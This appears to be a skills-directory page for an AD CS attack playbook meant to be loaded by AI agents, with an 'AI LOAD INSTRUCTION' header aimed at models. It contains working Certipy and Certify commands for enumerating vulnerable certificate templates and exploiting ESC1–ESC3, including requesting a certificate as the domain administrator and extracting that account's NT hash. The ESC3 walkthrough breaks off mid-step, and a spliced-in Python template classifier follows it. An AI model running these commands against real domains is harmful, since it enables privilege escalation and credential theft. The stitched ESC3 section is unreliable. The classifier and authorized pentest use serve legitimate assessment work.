
Active Directory Certificate Services
Follow a structured AD CS escalation playbook (ESC1–ESC13) when assessing misconfigured certificate templates and enrollment endpoints.
Overview
Active-directory-certificate-services is an agent skill for the Ship phase that guides authorized AD CS testing across ESC1–ESC13, relay scenarios, and certificate-based persistence.
Install
npx skills add https://github.com/yaklang/hack-skills --skill active-directory-certificate-services
What is this skill?
- ESC1 through ESC13 coverage with enrollment prerequisite chains
- Routes to ACL abuse, Kerberos, NTLM relay/coercion, and lateral-movement companion skills
- ADCS_ESC_MATRIX.md quick table with conditions, impact, and one-liner tool commands
- NTLM relay to HTTP enrollment (ESC8) and CA officer abuse patterns
- Detection indicators called out per technique in advanced reference
- Covers ESC1 through ESC13 in the expert playbook framing
- Companion matrix ADCS_ESC_MATRIX.md for per-ESC one-liners
Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).
What problem does it solve?
When AD CS is in scope, unstructured prompts skip the enrollment prerequisite chains and mix up ESC conditions, producing unsafe or incomplete escalation paths.
Who is it for?
Security engineers and pentesters with written authorization testing AD CS in Enterprise Active Directory environments.
Skip if: Solo indie web developers without AD infrastructure, unauthorized targets, or teams seeking generic OWASP web checks only.
When should I use this skill?
Targeting misconfigured AD CS for authorized privilege escalation, template abuse, NTLM relay to enrollment, or certificate persistence.
What do I get? / Deliverables
You get a routed playbook with matrix-backed commands, cross-links to ACL, Kerberos, relay, and lateral skills, and clearer detection hooks per technique.
- ESC-scoped attack path narrative
- Matrix-backed command references
- Cross-skill routing list (ACL, Kerberos, relay, lateral movement)
Journey fit
Ship is the canonical phase for pre-release and engagement-style security hardening where misissued or relayed certificates become critical findings before production trust boundaries freeze. Security subphase matches privilege-escalation and persistence techniques against Active Directory Certificate Services called out in the description and routing block.
How it compares
Use instead of generic 'Active Directory hacking' prompts that do not enumerate ESC1–ESC13 prerequisites and companion-skill handoffs.
Common Questions / FAQ
Who is active-directory-certificate-services for?
Licensed assessors and defenders deepening AD CS attack literacy during structured engagements or purple-team exercises.
When should I use active-directory-certificate-services?
During Ship security reviews when certificate templates, HTTP enrollment, or CA roles are in scope and you need ESC-variant selection with relay and persistence context.
Is active-directory-certificate-services safe to install?
Treat it as offensive knowledge: read the Prism Security Audits, follow your rules of engagement, and never aim techniques at systems you do not own or lack explicit permission to test.
SKILL.md - Active Directory Certificate Services
# SKILL: AD CS Attack Playbook — Expert Guide

> **AI LOAD INSTRUCTION**: Expert AD CS (Active Directory Certificate Services) attack techniques. Covers ESC1 through ESC13, certificate-based persistence, NTLM relay to enrollment endpoints, and CA misconfigurations. Base models miss enrollment prerequisite chains and ESC condition combinations.

## 0. RELATED ROUTING

Before going deep, consider loading:

- [active-directory-acl-abuse](../active-directory-acl-abuse/SKILL.md) for ACL-based attacks that enable ESC4 (template modification)
- [active-directory-kerberos-attacks](../active-directory-kerberos-attacks/SKILL.md) for Kerberos techniques after obtaining certificates
- [ntlm-relay-coercion](../ntlm-relay-coercion/SKILL.md) for ESC8 (relay to HTTP enrollment endpoint)
- [windows-lateral-movement](../windows-lateral-movement/SKILL.md) for using obtained certificates for lateral movement

### Advanced Reference

Also load [ADCS_ESC_MATRIX.md](./ADCS_ESC_MATRIX.md) when you need:

- ESC1–ESC13 quick reference table with conditions, impact, and tool commands
- One-liner exploitation commands per ESC variant
- Detection indicators per technique

---

## 1. AD CS ARCHITECTURE OVERVIEW

```
Certificate Authority (CA)
│
├── Enterprise CA (AD-integrated, issues certs based on templates)
│   ├── Certificate Templates (define who can enroll, what EKUs, subject settings)
│   ├── Enrollment endpoints: HTTP (certsrv), RPC, DCOM
│   └── Published in AD: CN=Public Key Services,CN=Services,CN=Configuration
│
├── Template Key Settings:
│   ├── Subject Alternative Name (SAN): who the cert represents
│   ├── Extended Key Usage (EKU): what the cert allows
│   ├── Enrollment permissions: who can request
│   └── Issuance requirements: manager approval, authorized signatures
│
└── Certificate → Kerberos Auth Flow: User presents cert → PKINIT → KDC verifies → issues TGT
```

---

## 2. ENUMERATION

```bash
# Certipy (recommended — comprehensive)
certipy find -u user@domain.com -p password -dc-ip DC_IP -stdout
certipy find -u user@domain.com -p password -dc-ip DC_IP -vulnerable -stdout

# Certify (from Windows)
Certify.exe find
Certify.exe find /vulnerable
Certify.exe cas            # Enumerate CAs

# Manual LDAP query for templates
ldapsearch -H ldap://DC_IP -D "user@domain.com" -w password \
  -b "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" \
  "(objectClass=pKICertificateTemplate)" cn msPKI-Certificate-Name-Flag pKIExtendedKeyUsage
```

---

## 3. ESC1 — ENROLLEE SUPPLIES SUBJECT

**Condition**: Template allows the enrollee to specify the Subject Alternative Name (SAN) + client authentication EKU + low-privilege enrollment (no manager approval, no authorized signatures required).

```bash
# Certipy
certipy req -u user@domain.com -p password -ca CA-NAME -target CA_HOST \
  -template VulnTemplate -upn administrator@domain.com

# Certify (Windows)
Certify.exe request /ca:CA-NAME /template:VulnTemplate /altname:administrator

# Authenticate with the certificate (PKINIT), then recover the NT hash
certipy auth -pfx administrator.pfx -dc-ip DC_IP
# → NT hash of administrator
```

---

## 4. ESC2 — ANY PURPOSE EKU

**Condition**: Template has the "Any Purpose" EKU or no EKU at all (as on a subordinate CA template) + low-privilege enrollment.

An Any Purpose or empty EKU set is accepted for client authentication, so the certificate works for PKINIT. Supplying a victim UPN with `-upn` only succeeds if the template also lets the enrollee supply the subject, in which case this is simply ESC1. If it does not, request the certificate for yourself and use it as an enrollment agent: an Any Purpose certificate satisfies the Certificate Request Agent requirement, so the on-behalf-of flow in section 5 applies.

```bash
# Only when the template also lets the enrollee supply the SAN (ESC1 conditions)
certipy req -u user@domain.com -p password -ca CA-NAME -target CA_HOST \
  -template AnyPurposeTemplate -upn administrator@domain.com
```

---

## 5. ESC3 — ENROLLMENT AGENT

**Condition**: One template issues an enrollment agent certificate (Certificate Request Agent EKU) to low-privilege users + another template accepts requests on behalf of other users (one authorized signature from a Certificate Request Agent).

```bash
# Step 1: Request enrollment agent cert
certipy req -u user@domain.com -p password -ca CA-NAME -target CA_HOST \
  -template EnrollmentAgent

# Step 2: Use enrollment
```
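The ldapsearch in section 2 returns raw template attributes, and sections 3 to 5 describe the conditions to look for in them. The following classifier, an added example that is not code from the hack-skills project, applies the ESC1, ESC2 and ESC3 template-side conditions to those attributes. It assumes the caller has already resolved each template's nTSecurityDescriptor into a list of principals holding the Enroll right (the `enroll` key); the sample templates are constructed, not real LDAP output.

```python
"""Classify AD CS certificate templates against the ESC1/ESC2/ESC3 preconditions.

Added example (not hack-skills project code).  Works on the LDAP attributes the
ldapsearch query returns, plus an "enroll" list that stands in for the parsed
nTSecurityDescriptor (assumption: resolved by the caller).  Sample data is constructed.
"""

# msPKI-Certificate-Name-Flag (MS-CRTD 2.26) and msPKI-Enrollment-Flag (2.27) bits
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # "CA certificate manager approval"

# EKU OIDs that decide the ESC1-ESC3 conditions
EKU_CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"
EKU_SMARTCARD_LOGON = "1.3.6.1.4.1.311.20.2.2"
EKU_PKINIT_CLIENT_AUTH = "1.3.6.1.5.2.3.4"
EKU_ANY_PURPOSE = "2.5.29.37.0"
EKU_CERTIFICATE_REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"
AUTH_EKUS = {EKU_CLIENT_AUTH, EKU_SMARTCARD_LOGON, EKU_PKINIT_CLIENT_AUTH}

# Principals whose Enroll right means "any domain account can request"
LOW_PRIV_PRINCIPALS = {"Authenticated Users", "Domain Users", "Domain Computers", "Everyone"}


def is_any_purpose(ekus):
    """No EKU at all (sub-CA style) or the Any Purpose OID: the cert is usable for anything."""
    return not ekus or EKU_ANY_PURPOSE in ekus


def allows_client_auth(ekus):
    """True if the cert can be presented to the KDC via PKINIT."""
    return is_any_purpose(ekus) or bool(AUTH_EKUS & set(ekus))


def low_priv_can_enroll(t):
    """Enrollment with no manual gate: no manager approval, no counter-signature, broad Enroll."""
    if t["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        return False
    if t["msPKI-RA-Signature"] > 0:
        return False
    return bool(LOW_PRIV_PRINCIPALS & set(t["enroll"]))


def classify(t):
    """Return the set of ESC labels whose template-side preconditions t satisfies."""
    ekus = t["pKIExtendedKeyUsage"]
    found = set()
    if low_priv_can_enroll(t):
        if (t["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
                and allows_client_auth(ekus)):
            found.add("ESC1")
        if is_any_purpose(ekus):
            found.add("ESC2")
        if EKU_CERTIFICATE_REQUEST_AGENT in ekus:
            found.add("ESC3")
    # ESC3 step 2 target: accepts one Certificate Request Agent counter-signature and
    # issues an authentication cert for whatever subject the agent names.
    if (t["msPKI-RA-Signature"] == 1
            and EKU_CERTIFICATE_REQUEST_AGENT in t["msPKI-RA-Application-Policies"]
            and allows_client_auth(ekus)
            and not (t["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS)
            and LOW_PRIV_PRINCIPALS & set(t["enroll"])):
        found.add("ESC3-target")
    return found


def template(cn, name_flag=0, enroll_flag=0, ra_sig=0, ekus=(), ra_policies=(),
             enroll=("Domain Users",)):
    """Build a dict shaped like the LDAP attributes plus the resolved Enroll list."""
    return {
        "cn": cn,
        "msPKI-Certificate-Name-Flag": name_flag,
        "msPKI-Enrollment-Flag": enroll_flag,
        "msPKI-RA-Signature": ra_sig,
        "pKIExtendedKeyUsage": list(ekus),
        "msPKI-RA-Application-Policies": list(ra_policies),
        "enroll": list(enroll),
    }


# Constructed sample templates (not real directory output)
SAMPLE_TEMPLATES = [
    template("VulnTemplate", name_flag=CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, ekus=[EKU_CLIENT_AUTH]),
    template("AnyPurposeTemplate", ekus=[EKU_ANY_PURPOSE]),
    template("SubCA-like", ekus=[]),                       # empty EKU list
    template("EnrollmentAgent", ekus=[EKU_CERTIFICATE_REQUEST_AGENT]),
    # Built-in-style User template: UPN comes from AD (flag 0x82000000 assumed), not the enrollee
    template("User", name_flag=0x82000000, ekus=[EKU_CLIENT_AUTH, "1.3.6.1.5.5.7.3.4"]),
    template("ApprovedAdmin", name_flag=CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
             enroll_flag=CT_FLAG_PEND_ALL_REQUESTS, ekus=[EKU_CLIENT_AUTH]),
    template("OnBehalfUser", ra_sig=1, ra_policies=[EKU_CERTIFICATE_REQUEST_AGENT],
             ekus=[EKU_CLIENT_AUTH]),
    template("AdminOnly", name_flag=CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, ekus=[EKU_CLIENT_AUTH],
             enroll=["Domain Admins"]),
]


def findings(templates=SAMPLE_TEMPLATES):
    """Map template cn -> sorted ESC labels, for templates that match at least one."""
    return {t["cn"]: sorted(classify(t)) for t in templates if classify(t)}


if __name__ == "__main__":
    for cn, escs in findings().items():
        print(f"{cn}: {', '.join(escs)}")
```

The check deliberately separates the issuance gates (manager approval, authorized signatures) from the SAN and EKU settings: a template that lets the enrollee supply the subject but requires manager approval is not ESC1, and a template that requires one Certificate Request Agent signature is not directly enrollable but is exactly the second template ESC3 needs.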